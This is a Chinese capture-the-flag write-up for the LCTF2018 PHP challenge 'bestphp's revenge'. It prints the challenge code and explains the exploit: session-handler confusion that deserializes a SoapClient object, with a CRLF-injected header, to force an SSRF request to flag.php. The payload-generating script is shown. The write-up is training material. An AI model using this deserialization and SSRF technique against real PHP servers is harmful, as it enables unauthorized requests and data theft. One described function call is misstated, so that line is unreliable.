微信公众号搜"智元新知"关注
微信扫一扫可直接关注哦!

bestphp's revenge刷题笔记

题目源码

index.PHP

 <?PHP
highlight_file(__FILE__);
$b = 'implode'; //可被覆盖
call_user_func($_GET['f'], $_POST);
session_start();
if (isset($_GET['name'])) {
    $_SESSION['name'] = $_GET['name'];
}
var_dump($_SESSION);
$a = array(reset($_SESSION), 'welcome_to_the_lctf2018');
call_user_func($b, $a);
?> 

flag.PHP

<?PHP
session_start(); 
echo 'only localhost can get flag!'; 
$flag = 'LCTF{*************************}'; 
if($_SERVER["REMOTE_ADDR"]==="127.0.0.1"){ //要通过ssrf来获取flag $_SESSION['flag'] = $flag; }?>

解题思路:利用session反序列化触发soapclient类方法进行ssrf访问flag,PHP

第一步:

session反序列化需要session.serialize_handler使用与认不一样,所以首先用第一个call_user_func执行session_start('session.serialize_handler','PHP_serialize')设置用PHP_serialize来处理session,同时session反序列化时构造的类为soapclient

利用soapclient构造ssrf

<?PHP
$a = new SoapClient(null,
    array(
        'user_agent' => "aaa\r\nCookie:PHPSESSID=u6ljl69tjrbutbq4i0oeb0m332",  //这里可以通过加crlf的方法控制header,带上自己的sessionid
        'uri' => 'bbb',
        'location' => 'http://ae0bb0f2-f512-4118-8f03-60a13b829c0a.node4.buuoj.cn:81/flag.PHP' //向此处发起请求
    )
);
$b = serialize($a);
echo urlencode($b);
?>

然后将其前加|传入name中(写入session并被PHP解析为键值)

 

此时name被通过PHP_serialize处理写入了session数组中

第二步:

要想办法触发soapclient的序列化值,要先调用其中的_call,此时用PHP引擎来反序列化session,$a数组中第一项即为我们构造的soapclient类,在第二个call_user_func中让这个类调用不存在的方法即可触发ssrf

做题过程中遇到了一个坑,如果soapclient发起请求中带的sessionid是自己在本题环境中拿到的sessionid则第二步会造成死循环引发504错误

回头看思路有迹可循但确实好难想到啊

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。

相关推荐